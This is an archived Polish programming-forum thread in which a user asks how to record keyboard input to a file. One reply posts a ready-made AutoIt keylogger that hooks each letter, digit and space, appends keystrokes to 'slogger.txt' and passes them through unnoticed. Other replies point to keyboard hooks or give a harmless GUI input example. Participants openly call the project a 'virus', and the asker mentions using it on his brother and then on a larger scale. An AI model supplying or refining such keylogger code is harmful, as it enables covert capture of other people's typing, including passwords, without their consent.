Skocz do zawartości
  • 👋 Witaj na MPCForum!

    Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

    • Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

    👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

    Zarejestruj się teraz

Wczytywanie z klawiatury do zmiennej


ZakuG

Rekomendowane odpowiedzi

Opublikowano

Siema, macie pomysł jak "wczytać" dane z klawiatury i zapisać do zmiennej, a ze zmiennej do plijku ?

Chodzi mi o to aby pisząc na klawiaturze, dane zostawały zapamiętywane do zmiennej, a ze zmiennej do pliku przez FileWrite. Chyba, że jest inny sposób, na bezpośrednie wczytanie danych wpisywanych na klawiaturze prosto do pliku.

Bardzo Was proszę o szybką odpowiedź. Pozdrawiam ;)

Opublikowano

szykuje się wirusik ? :>

_ispressed robisz każdy klawisz do zmiennej i potem że jak zostanie wciśnięty to zapisze do pliku :D

 

@down czemu niby najgorsza ? ( a opcja to opcja i wypada podać wszystkie :P )

Opublikowano

...a po cuj ispressed... to najgorsza z możliwych opcji

Albo robisz hotkeye na interesujące cię klawisze (tablica z klawiszami i pętla) albo zakładasz hooka na klawiaturę...

 

Co do drugiego, to jest to w helpie pod hasłem _WinAPI_SetWindowsHookEx

846331404756772371599.jpeg
Opublikowano

co do _ispressed to zapisałem do zmiennych, ale jak zostaje wciśnięty to zapisuje paredziesiąt-pareset razy. :/ teraz hooka sprawdzę..

Opublikowano

Zarzucę małym gotowcem, wyciągnij sobie z niego co tam potrzebujesz:

 

 

 


#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Icon=app.ico
#AutoIt3Wrapper_Compile_Both=y
#AutoIt3Wrapper_UseX64=y
#AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include <ButtonConstants.au3>
#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
#include "udf.au3"

$file = FileOpen("slogger.txt",1)
$login=""
HotStringset($login, "nasluch")

While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit

EndSwitch
WEnd

Func logea()
HotKeySet(@HotKeyPressed)
FileWrite($file, @HotKeyPressed)
Send(@HotKeyPressed)
EndFunc

func nasluch()
HotKeySet(" ", "logea")
HotKeySet("a", "logea")
HotKeySet("b", "logea")
HotKeySet("c", "logea")
HotKeySet("d", "logea")
HotKeySet("e", "logea")
HotKeySet("f", "logea")
HotKeySet("g", "logea")
HotKeySet("h", "logea")
HotKeySet("i", "logea")
HotKeySet("j", "logea")
HotKeySet("k", "logea")
HotKeySet("l", "logea")
HotKeySet("m", "logea")
HotKeySet("n", "logea")
HotKeySet("n", "logea")
HotKeySet("o", "logea")
HotKeySet("p", "logea")
HotKeySet("q", "logea")
HotKeySet("r", "logea")
HotKeySet("s", "logea")
HotKeySet("t", "logea")
HotKeySet("u", "logea")
HotKeySet("v", "logea")
HotKeySet("w", "logea")
HotKeySet("x", "logea")
HotKeySet("y", "logea")
HotKeySet("z", "logea")
HotKeySet("A", "logea")
HotKeySet("B", "logea")
HotKeySet("C", "logea")
HotKeySet("D", "logea")
HotKeySet("E", "logea")
HotKeySet("F", "logea")
HotKeySet("G", "logea")
HotKeySet("H", "logea")
HotKeySet("I", "logea")
HotKeySet("J", "logea")
HotKeySet("K", "logea")
HotKeySet("L", "logea")
HotKeySet("M", "logea")
HotKeySet("N", "logea")
HotKeySet("N", "logea")
HotKeySet("O", "logea")
HotKeySet("P", "logea")
HotKeySet("Q", "logea")
HotKeySet("R", "logea")
HotKeySet("S", "logea")
HotKeySet("T", "logea")
HotKeySet("U", "logea")
HotKeySet("V", "logea")
HotKeySet("W", "logea")
HotKeySet("X", "logea")
HotKeySet("Y", "logea")
HotKeySet("Z", "logea")
HotKeySet("0", "logea")
HotKeySet("1", "logea")
HotKeySet("2", "logea")
HotKeySet("3", "logea")
HotKeySet("4", "logea")
HotKeySet("5", "logea")
HotKeySet("6", "logea")
HotKeySet("7", "logea")
HotKeySet("8", "logea")
HotKeySet("9", "logea")
EndFunc

 

 

Opublikowano

Polecam GUICtrlRead.

Podczepiasz do zmiennej i podajesz inputa.

 

@Edit Czekajcie też zarzucę gotowcem.

 

#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <WindowsConstants.au3>
#Region ### START Koda GUI section ### Form=
$Form1 = GUICreate("Wczytywanie z klawiatury do zmiennej", 401, 151, 192, 124)
$Input1 = GUICtrlCreateInput("", 96, 32, 209, 21)
$Button1 = GUICtrlCreateButton("Zapisz do pliku", 120, 72, 161, 33)
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###

While 1
   $nMsg = GUIGetMsg()
   Switch $nMsg
       Case $GUI_EVENT_CLOSE
           Exit
       Case $Button1
           FileWrite("Pliczek.txt", GUICtrlRead($Input1))
   EndSwitch
WEnd

obraz24.png


Opublikowano

Dzisiaj lub jutro wrócę do Gdyni i przetestuję u siebie. Wczoraj robiłem u brata. Tak, Tapne wirusik-zwij to jak chcesz :) jak narazie to projekt dla brata, a potem myślę na większą skalę. Dziękuję za odpowiedzi, co do GUI to ma wczytywać w tle, ale może nie zrozumiałem :P będę na kompie to sprawdze wszystko, macie lajki. Pozdrawiam ;) //telefon

Opublikowano

Ta, na większą skalę ;d i myślę tutaj o opublikowaniu freeware. A nie o czymś więcej :P autoit to dobre gówno i zdaje se z tego sprawę, więc luz ;d bo coś pożądnego zrobię w c#. ^^ pozdro ;)

Opublikowano

To od razu zacznij w C#, toż to banał.

I jak nie masz wiedzy to nawet nie pokazuj się z kloggerem/wirusem chyba że robisz zasadzkę dla dzieci neo które nie umieją odłączyć procesu.

Opublikowano

co, że ja nie mam wiedzy ? ziomek, luz ;p brat chciał na szybko więc robie bo mu potrzeba. a zanim zacznę w c# to czekam na MS Visual Studio 2012...

Opublikowano
co, że ja nie mam wiedzy ? ziomek, luz ;p

 

Jak byś miał to byś nie nie pytał jak zrobić Wirusa etc na forum tylko zrobił to w 15 minut w C#.

 

a zanim zacznę w c# to czekam na MS Visual Studio 2012...

 

Nie ma na co czekać bo MSV 2012 jest tak samo udane jak W8.

Polecam 2010 albo 2008.

Opublikowano

spoko, tylko że pełniaka 2010 nie dostanę już chyba z projektu MSDN. w sumie jeszcze sprawdzę..

 

@Ark, ogarniam wszystkiego po trochu..

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

×
×
  • Dodaj nową pozycję...